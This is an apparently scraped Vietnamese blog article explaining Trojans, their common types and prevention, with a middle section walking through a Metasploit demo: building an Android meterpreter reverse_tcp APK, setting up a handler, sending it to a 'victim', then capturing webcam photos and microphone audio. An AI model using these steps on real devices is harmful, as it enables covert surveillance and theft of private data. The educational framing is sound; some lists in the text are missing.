Virus trojan la gi
|
Hiện nay có khá nhiều cách tấn công mạng nhằm đánh cắp thông tin. Mình đã viết về một số kiểu tấn công như MITM, Evil Twin... Trong bài này mình sẽ đề cập tới một loại phần mềm hay mã hóa dùng để tấn công kiểm soát máy tính, điện thoại đó là Trojan. Show Trojan là gì?Hẳn là bạn đã từng xem hay nghe về truyền thuyết người Hy Lạp đã giành chiến thắng trong cuộc chiến thành Troy bằng cách ẩn trong một con ngựa khổng lồ bằng gỗ rỗng lẻn vào thành Troy. Trojan cũng như vậy, nó hoạt động như một ứng dụng hoặc file hợp lệ để đánh lừa người dùng tải về, cài đặt và chạy trên thiết bị. Sau khi được cài đặt, nó sẽ thực hiện các hành động độc hại như làm hỏng, phá vỡ, đánh cắp hoặc thực hiện một số hành vi độc hại khác trên dữ liệu hoặc hệ thống mạng của người dùng. Một số Trojan phổ biến1. Trojan Backdoor Loại trojan này có thể tạo "backdoor" trực tiếp, cho phép kẻ tấn công truy cập và kiểm soát máy tính người dùng. Dữ liệu người dùng có thể bị tải xuống và đánh cắp bởi các bên thứ 3, hoặc các phần mềm độc hại khác được tải lên và cài đặt trên máy tính của họ. 2. Trojan DDoS (Distributed Denial Of Service) Loại Trojan này thực hiện các cuộc tấn công dịch vụ (DDoS). Ý tưởng là tấn công một mạng bằng cách lạm dụng lưu lượng truy cập trên máy tính bị nhiễm của người dùng. 3. Trojan Downloader Trojan này nhắm mục tiêu đến máy tính người dùng đã bị nhiễm, tải xuống và cài đặt các biến thể của chương trình độc hại, bao gồm Trojan và phần mềm quảng cáo (adware). 4. Trojan Fake AV Trojan Fake AV hoạt động như phần mềm diệt virus nhưng đòi tiền chuộc để quét và loại bỏ các mối đe dọa, dù là thật hay giả mạo. 5. Trojan Remote Access Loại Trojan này cung cấp cho kẻ tấn công toàn quyền kiểm soát máy tính nạn nhân thông qua kết nối mạng từ xa để đánh cắp các thông tin hoặc theo dõi họ.... Mục đích của những kẻ viết ra Trojans:
Trojan hoạt động thế nào? Cách phòng tránh TrojanTrojan ẩn mình dưới rất nhiều hình thức khác nhau từ bài hát, phần mềm, hình ảnh, link tải, quảng cáo và trông chúng an toàn, hợp pháp để người dùng tải xuống máy tính hay chỉ cần click chuột vào. Khi đó các phần mềm gián điệp sẽ nhanh chóng xâm nhập vào hệ thống máy tính, chờ tín hiệu của người muốn xâm nhập máy tính và sau đó để hắn khống chế toàn bộ dữ liệu cá nhân của người dùng. Khác với virus khi tấn công trực tiếp dễ bị phần mềm antivirus phát hiện, thì trojan tấn công dưới một chương trình, phần mềm khác như đuôi .exe,.com,.scr,.bat, hay.pif. Trojan là một phần mềm thông thường và không tự lây lan như virus. Để có thể hiểu rõ hơn cách tấn công, để có thể phòng tránh ta sẽ thực hiện một cuộc tấn công demo. Trong demo này mình sẽ tiếp tục dùng kali linux gửi một trojan tới máy android sau đó thực hiện lấy cắp thông tin. Đương nhiên demo này rất đơn giản cũng không tính phá hoại. Trojan đánh cắp thông tin thế nào?Đầu tiên kiểm tra địa chỉ ip máy bằng lệnh ifconfìg. Để tạo file apk chạy trên máy android dùng lệnh msfpayload android/meterperter/reverse_tcp lhost=(địa chỉ ip máy) lport=8080 R >(địa chỉ file trojan) Tiếp theo sử dụng lệnh msfconsoleđể chạy chương trình.  Tiếp tục thực hiện các lệnh sau: use exploit/multi/handler set payload android/meterpreter/reverse_tcp Thiết lập thông số bằng lệnh: set lhost(điạ chỉ ip) , set lport 8080 Cuối cùng chạy lệnh: exploit Sau khi thực hiện xong các bước trên. Ta cần thực hiện bước quan trọng nhất đó là gửi file trojan cho victim, có thể gửi bằng nhiều phương thức chỉ cần victim tải file đó xuống thì đã thành công. Tiếp theo chúng ta cứ coi như victim đã tải xuống file trojan. Để có thể thực hiện lấy cắp thông tin ta sẽ sử dụng một số lệnh sau. Chụp ảnh sử dụng lệnh: webcam_list Chụp bằng camera trước: webcam_snap 1 . Sau khi chụp xong ảnh đã lưu tại địa chỉ /root/..... Ghi âm trong 30s sử dụng lệnh: record_mic 30. Sau khi ghi âm xong đã lưu file tại /root/.... như ảnh phía dưới Ok sau khi trải qua demo này ta có thể thấy cách để trojan tấn công rất đơn giản là ẩn mình dưới một file nào đó. Từ đó chúng ta có thể nhận biết trojan qua:
Tất nhiên đây chỉ là một vài dấu hiệu nhận biết cho những loại trojan đơn giản. Hiện nay trojan đã tinh vi hơn khi chúng không để lại bất cứ dấu hiệu nào, và ở nhiều dạng khác nhau.
Cách phòng tránh TrojanSau khi xem qua demo cách thức tấn công thì ta có thể thấy cách hữu hiệu để phòng tránh trojan đó là không bao giờ mở bất kỳ tập tin, link hay phần mềm lạ, hay thậm chí email từ địa chỉ bạn quen biết vì đây là bước quan trọng nhất để cuộc tấn công thành công. Trojan chỉ phát tán khi bạn click trực tiếp vào những nội dung chứa phần mềm gián điệp mà thôi. Tốt nhất nên kiểm tra trước bằng những chương trình quét virus hay dùng Virustotal để kiểm tra. Luôn sử dụng những phần mềm antivirus hay tường lửa để bảo vệ máy tính. Cập nhật đầy đủ các bản vá lỗ hổng thường xuyên với máy tính Windows, để tránh trường hợp hacker lợi dụng những lỗ hổng đó xâm nhập máy tính. Tạm kếtHi vọng thông qua bài viết này các bạn có thêm một số hiểu biết về trojan. Để có thể phòng tránh tin tặc tấn công. Nếu cảm thấy thích những bài viết về tấn công mạng hãy like và để lại comment nhé |
